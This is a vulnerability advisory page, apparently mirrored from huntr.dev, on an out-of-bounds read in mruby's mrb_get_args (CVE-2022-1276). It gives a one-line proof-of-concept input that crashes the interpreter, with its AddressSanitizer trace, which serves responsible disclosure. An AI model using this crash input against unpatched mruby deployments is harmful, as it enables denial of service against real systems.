Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
huntrWwkenwong6EA041D1-E2AA-472C-BF3E-DA5FA8726C25
HistoryApr 06, 2022 - 6:40 p.m.

Out-of-bounds Read in mrb_get_args

2022-04-0618:40:57
wwkenwong
www.huntr.dev
16
mrb_get_args
mruby
out-of-bounds read
addresssanitizer
segv
ubuntu 18.04
ken wong
black bauhinia
alex cheung

EPSS

0.002

Percentile

61.3%

JSON

Out-of-bounds Read in mrb_get_args in mruby/mruby

Affected commit

3cf291f72224715942beaf8553e42ba8891ab3c6

Proof of Concept

0..% = [0,0,0,0,0,0,0,0,0,0,0,0,0,**{}] = 0

Below is the output from mruby ASAN build:

AddressSanitizer:DEADLYSIGNAL
=================================================================
==36059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x000000418ac7 bp 0x7ffe61994cc0 sp 0x7ffe619949b0 T0)
==36059==The signal is caused by a READ memory access.
==36059==Hint: address points to the zero page.
    #0 0x418ac7 in mrb_get_args /root/mruby/src/class.c:1009
    #1 0x456ac6 in mrb_str_aset_m /root/mruby/src/string.c:1334
    #2 0x4840ba in mrb_vm_exec /root/mruby/src/vm.c:1638
    #3 0x475dcc in mrb_vm_run /root/mruby/src/vm.c:1132
    #4 0x4bf928 in mrb_top_run /root/mruby/src/vm.c:3045
    #5 0x4eba38 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6891
    #6 0x4ebcd5 in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6934
    #7 0x40672c in main /root/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
    #8 0x7f8cad9030b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #9 0x403a7d in _start (/root/mruby/bin/mruby+0x403a7d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/mruby/src/class.c:1009 in mrb_get_args
==36059==ABORTING

Test Platform:

Ubuntu 18.04

Acknowledgements

This bug was found by Ken Wong(@wwkenwong) from Black Bauhinia(@blackb6a) and Alex Cheung

Related

rubygems 1
ubuntucve 1
alpinelinux 1
cvelist 1
prion 1
osv 1
debiancve 1
nvd 1
cve 1
rubygems
rubygems
Out-of-bounds Read in mrb_get_args in mruby/mruby
2022-04-09 21:00:00
ubuntucve
ubuntucve
CVE-2022-1276
2022-04-10 00:00:00
alpinelinux
alpinelinux
CVE-2022-1276
2022-04-10 10:15:00
cvelist
cvelist
CVE-2022-1276 Out-of-bounds Read in mrb_get_args in mruby/mruby
2022-04-10 09:35:10
prion
prion
Design/Logic Flaw
2022-04-10 10:15:00
osv
osv
CVE-2022-1276
2022-04-10 10:15:07
debiancve
debiancve
CVE-2022-1276
2022-04-10 10:15:07
nvd
nvd
CVE-2022-1276
2022-04-10 10:15:07
cve
cve
CVE-2022-1276
2022-04-10 10:15:07

EPSS

0.002

Percentile

61.3%

JSON
Related for 6EA041D1-E2AA-472C-BF3E-DA5FA8726C25
rubygems1ubuntucve1alpinelinux1cvelist1prion1osv1debiancve1nvd1cve1